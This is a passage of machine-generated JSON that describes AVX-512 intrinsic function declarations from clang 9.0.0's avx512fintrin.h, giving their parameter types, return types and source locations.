"/usr/lib/clang/9.0.0/include/avx512fintrin.h:5661:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5667:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5675:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5689:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5697:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5705:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5711:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5719:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5727:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5733:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5741:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5749:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5755:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5771:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5777:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_sra_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5785:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5793:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5799:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5807:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5821:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srav_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5837:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5843:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5851:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5859:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5865:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5873:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5881:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5887:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5895:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5903:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5909:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5917:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_cvtsd_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5975:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtsd_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:5987:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvtss_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6013:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtss_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6025:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttsd_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6040:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvttsd_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttsd_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6065:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvttsd_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6077:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttss_i32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6092:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvttss_i64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttss_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6117:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvttss_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6129:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6164:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6170:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6178:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6192:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6208:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6215:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6223:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6232:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6298:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6307:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6430:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6469:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6480:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", 